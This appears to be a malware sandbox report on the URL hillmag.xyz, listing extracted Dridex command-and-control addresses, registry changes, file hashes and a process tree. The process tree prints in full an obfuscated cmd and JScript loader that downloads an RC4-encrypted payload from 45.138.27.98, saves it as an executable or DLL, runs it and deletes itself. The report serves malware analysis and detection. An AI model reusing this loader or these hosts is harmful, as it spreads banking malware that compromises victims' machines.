Overview
overview
10Static
static
URLScan
urlscan
http://hillmag.xyz/
windows7_x64
1http://hillmag.xyz/
windows7_x64
6http://hillmag.xyz/
windows7_x64
1http://hillmag.xyz/
windows10_x64
10http://hillmag.xyz/
windows10_x64
10http://hillmag.xyz/
windows10_x64
10http://hillmag.xyz/
windows10_x64
10http://hillmag.xyz/
linux_amd64
Analysis
-
max time kernel
148s -
max time network
151s -
platform
windows10_x64 -
resource
win10-en-20210920 -
submitted
30-09-2021 23:52
Static task
static1
URLScan task
urlscan1
Sample
http://hillmag.xyz/
Behavioral task
behavioral1
Sample
http://hillmag.xyz/
Resource
win7-ja-20210920
Behavioral task
behavioral2
Sample
http://hillmag.xyz/
Resource
win7v20210408
Behavioral task
behavioral3
Sample
http://hillmag.xyz/
Resource
win7-de-20210920
Behavioral task
behavioral4
Sample
http://hillmag.xyz/
Resource
win10v20210408
Behavioral task
behavioral5
Sample
http://hillmag.xyz/
Resource
win10-ja-20210920
Behavioral task
behavioral6
Sample
http://hillmag.xyz/
Resource
win10-en-20210920
Behavioral task
behavioral7
Sample
http://hillmag.xyz/
Resource
win10-de-20210920
Behavioral task
behavioral8
Sample
http://hillmag.xyz/
Resource
ubuntu-amd64
General
Malware Config
Extracted
dridex
10111
185.168.130.138:443
79.172.255.198:9676
195.154.108.109:10172
Signatures
-
Blocklisted process makes network request 1 IoCs
Processes:
wscript.exeflow pid process 17 1116 wscript.exe -
Executes dropped EXE 1 IoCs
Processes:
d5krb.exepid process 2936 d5krb.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Processes:
d5krb.exedescription ioc process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA d5krb.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Processes:
iexplore.exeIEXPLORE.EXEdescription ioc process Key created \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Internet Explorer\Main iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Internet Explorer\VersionManager\LastTTLHighDateTime = "50" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateHighDateTime = "30914134" IEXPLORE.EXE Set value (data) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Internet Explorer\FlipAhead\Meta\generator$WordPress iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Internet Explorer\FlipAhead\FileVersion = "2016061511" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Internet Explorer\HistoryJournalCertificate\NextUpdateDate = "339827560" iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "339810966" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Internet Explorer\HistoryJournalCertificate iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Internet Explorer\FlipAhead iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Internet Explorer\FlipAhead\Meta\generator$http://www.typepad.com/ iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Internet Explorer\Main IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateLowDateTime = "1721350154" IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\en-US = "en-US.1" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Internet Explorer\FlipAhead\Meta iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Internet Explorer\FlipAhead\Meta\generator$Discuz! iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Internet Explorer\FlipAhead\NextUpdateDate = "339859552" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Internet Explorer\VersionManager iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateLowDateTime = "1699161273" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\ iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Internet Explorer\DomainSuggestion iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Internet Explorer\FlipAhead\Meta\generator$blogger iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Internet Explorer\FlipAhead\Meta\generator$MediaWiki iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Internet Explorer\FlipAhead\Meta\generator$vBulletin 3 iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{907F5CA8-2249-11EC-AF2E-EE29200C20B6} = "0" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Internet Explorer\VersionManager\LastUpdateLowDateTime = "1699161273" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Internet Explorer\VersionManager\LastUpdateHighDateTime = "30914134" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Internet Explorer\VersionManager\LastTTLLowDateTime = "1251635200" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateHighDateTime = "30914134" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Internet Explorer\VersionManager IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Internet Explorer\FlipAhead\Meta\generator$Telligent iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Internet Explorer\FlipAhead\Meta\generator$vBulletin 4 iexplore.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
iexplore.exepid process 2428 iexplore.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
Processes:
iexplore.exepid process 2428 iexplore.exe -
Suspicious use of SetWindowsHookEx 6 IoCs
Processes:
iexplore.exeIEXPLORE.EXEpid process 2428 iexplore.exe 2428 iexplore.exe 2736 IEXPLORE.EXE 2736 IEXPLORE.EXE 2736 IEXPLORE.EXE 2736 IEXPLORE.EXE -
Suspicious use of WriteProcessMemory 15 IoCs
Processes:
iexplore.exeIEXPLORE.EXEcmd.exewscript.execmd.exedescription pid process target process PID 2428 wrote to memory of 2736 2428 iexplore.exe IEXPLORE.EXE PID 2428 wrote to memory of 2736 2428 iexplore.exe IEXPLORE.EXE PID 2428 wrote to memory of 2736 2428 iexplore.exe IEXPLORE.EXE PID 2736 wrote to memory of 584 2736 IEXPLORE.EXE cmd.exe PID 2736 wrote to memory of 584 2736 IEXPLORE.EXE cmd.exe PID 2736 wrote to memory of 584 2736 IEXPLORE.EXE cmd.exe PID 584 wrote to memory of 1116 584 cmd.exe wscript.exe PID 584 wrote to memory of 1116 584 cmd.exe wscript.exe PID 584 wrote to memory of 1116 584 cmd.exe wscript.exe PID 1116 wrote to memory of 1216 1116 wscript.exe cmd.exe PID 1116 wrote to memory of 1216 1116 wscript.exe cmd.exe PID 1116 wrote to memory of 1216 1116 wscript.exe cmd.exe PID 1216 wrote to memory of 2936 1216 cmd.exe d5krb.exe PID 1216 wrote to memory of 2936 1216 cmd.exe d5krb.exe PID 1216 wrote to memory of 2936 1216 cmd.exe d5krb.exe
Processes
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" http://hillmag.xyz/1⤵
- Modifies Internet Explorer settings
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2428 CREDAT:82945 /prefetch:22⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.execmd.exe /q /c cd /d "%tmp%" && echo function O(l){return Math.random().toString(36).slice(-5)};function V(k){var y=Q;y["set"+"Proxy"](n);y.open("GET",k(1),1);y.Option(n)=k(2);y.send();y/*XASX1ASXASS*/["Wait"+"ForResponse"]();if(200==y.status)return _(y.responseText,k(n))};function _(k,e){for(var l=0,n,c=[],F=256-1,S=String,q=[],b=0;256^>b;b++)c[b]=b;for(b=0;256^>b;b++)l=l+c[b]+e["cha"+"rCodeAt"](b%e.length)^&F,n=c[b],c[b]=c[l],c[l]=n;for(var p=l=b=0;p^<k.length;p++)b=b+1^&F,l=l+c[b]^&F,n=c[b],c[b]=c[l],c[l]=n,q.push(S.fromCharCode(k.charCodeAt(p)^^c[c[b]+c[l]^&F]));return q.join("")};try{var u=WScript.Echo(),o="Object",A=Math,a=Function("b","return WScript.Create"+o+"(b)");P=(""+WScript).split(" ")[1],M="indexOf",q=a(P+"ing.FileSystem"+o),m=WScript.Arguments,e="WinHTTP",Z="cmd",Q=a("WinH"+"ttp.WinHttpRequest.5.1"),j=a("W"+P+".Shell"),s=a("ADODB.Stream"),x=O(8)+".",p="exe",n=0,K=WScript[P+"FullName"],E="."+p;Y="Type";s[Y]=2;s.Charset="iso-8859-1";s.Open();try{v=V(m)}catch(W){v=V(m)};d=v.charCodeAt(027+v[M]("PE\x00\x00"));s.WriteText(v);if(32-1^<d){var z=1;x+="dll"}else x+=p;s.savetofile(x,2);s.Close();z^&^&(x="regsvr"+32+E+" /s "+x);j.run(Z+E+" /c "+x,0)}catch(xXASXASSAA){};q.Deletefile(K);>3.tMp && stArt wsCripT //B //E:JScript 3.tMp "hX1ZytEytd" "http://45.138.27.98/?Mzg3NjI=&rpuEpV&dsfdffg43t=6NbP0zYA0SD2I3fz-3ORZzxOWPPk7DPRAOzrl6CelXXpvAkfrsCOwHp2EGILgQznYpZBFlA96n830KHyB-Z0ZaGrhCFUQhN-KLIVLI46A&cxssdvxcv=84ybobs.77zb57.406u6s2j6&sdfsdfdfg=community&ogfgafgn4=w33QMvXcJx7QFYPJKfjcT&fhfghddfsdf=twix&yKPqFawWdMjEwMjU=" "2""3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\wscript.exewsCripT //B //E:JScript 3.tMp "hX1ZytEytd" "http://45.138.27.98/?Mzg3NjI=&rpuEpV&dsfdffg43t=6NbP0zYA0SD2I3fz-3ORZzxOWPPk7DPRAOzrl6CelXXpvAkfrsCOwHp2EGILgQznYpZBFlA96n830KHyB-Z0ZaGrhCFUQhN-KLIVLI46A&cxssdvxcv=84ybobs.77zb57.406u6s2j6&sdfsdfdfg=community&ogfgafgn4=w33QMvXcJx7QFYPJKfjcT&fhfghddfsdf=twix&yKPqFawWdMjEwMjU=" "2""4⤵
- Blocklisted process makes network request
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c d5krb.exe5⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\d5krb.exed5krb.exe6⤵
- Executes dropped EXE
- Checks whether UAC is enabled
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776MD5
d302a1fb716166b280c2accd4491966e
SHA19eff2394f8616a4567f3eb895747ddf81fa68207
SHA256ce29369602f384184b8fc7be24fa322fe70da4590f73921eada2cf12774a4afc
SHA512c2b90c30f558518426cd0135a06dfc7d1c986635a9effffa34af80a8adaf566002d17288409b838452510212f774f5b75f2772e4acc20d7b19ad6f99751dc9ea
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776MD5
7f2382cbe0c2807fc0f4c359d350836d
SHA137d874f1f5a782a383ad9d35c6d97401d63d334e
SHA25693a1d9c56ce2845275a92d89930f534032bf4ad4b6eb4bada59c7930789b1e7d
SHA512d437f652e45bc7d9e2a20f38fcbec58624c0d552953a183895a84ba4f2b882173020029f54743f4bebbc75346661896e7a5cc4a76fa19099092bdc0aa9103656
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\JY06HFGL.cookieMD5
536e62b4a847388ea66c5179a64b9f40
SHA1123174e3b4fbf2ddc61b5b7e75fdfa5a9718d71d
SHA256b6023daa49c64846b0284a976e0c88f0381ba13b09458f3fa5794c32ff5a76c6
SHA5127ec8750178dcdfecac122ee396c55c00a6f512232e7080e889434db4c6ec2ff5abffc2b8c2c0a91aac7409f0b2887c0d1f38bd4c04b70aa2f803f8f4df835b0d
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\LPO196OT.cookieMD5
481274988af7cdcaee286221d6a61b12
SHA15dfac1a490127353a5929ecc747b1000f31967db
SHA256c6310be473aef7d3b06e0c4c2eb3a30e5f7df96b6d07edaaecd2c141c9eb5577
SHA512fa21fd6171c875a1dfd2ce4f77fce9a3c0dfaa0c6a91680296728fa599090a9cc81ccd0a9dcff0236aab3e86cc4644b306e74952518b2b0a917c8945612c19d8
-
C:\Users\Admin\AppData\Local\Temp\3.tMpMD5
60fc00422b399db85f87d41b8328976d
SHA1bb85034acad8025f97e5bb236443debaf8926e4b
SHA256c38eb3965155b143c8d72bf219ec6dd985a106ce0776c272470b0019e74fb690
SHA51216fa1a3c187500b5c3867fa05752428496273b73c2960c54d2e34e4833a057392c1f5469c8824fdc3d29c9ece2e65189ee281638ccaae941437a259192591151
-
C:\Users\Admin\AppData\Local\Temp\d5krb.exeMD5
f2732682a214f0598ceaf44cc0ed346c
SHA1e05362dd29050def13a63018583dd55c0cb26709
SHA256724532730fb3e786ce24b914f31165be171991283bcc5b550c8d4df9da786e1c
SHA5124061e6510259db25fc08b0c7799668f963f4afb21145840ad34d92b32a064238a2f57b08981c85b0a804f77b4dea7872091705f17f36a2486882a689d3daaab6
-
C:\Users\Admin\AppData\Local\Temp\d5krb.exeMD5
f2732682a214f0598ceaf44cc0ed346c
SHA1e05362dd29050def13a63018583dd55c0cb26709
SHA256724532730fb3e786ce24b914f31165be171991283bcc5b550c8d4df9da786e1c
SHA5124061e6510259db25fc08b0c7799668f963f4afb21145840ad34d92b32a064238a2f57b08981c85b0a804f77b4dea7872091705f17f36a2486882a689d3daaab6
-
memory/584-117-0x0000000000000000-mapping.dmp
-
memory/1116-118-0x0000000000000000-mapping.dmp
-
memory/1216-120-0x0000000000000000-mapping.dmp
-
memory/2428-115-0x00007FF9AC260000-0x00007FF9AC2CB000-memory.dmpFilesize
428KB
-
memory/2736-116-0x0000000000000000-mapping.dmp
-
memory/2936-121-0x0000000000000000-mapping.dmp
-
memory/2936-124-0x0000000000500000-0x000000000064A000-memory.dmpFilesize
1.3MB
-
memory/2936-125-0x0000000000400000-0x00000000004F9000-memory.dmpFilesize
996KB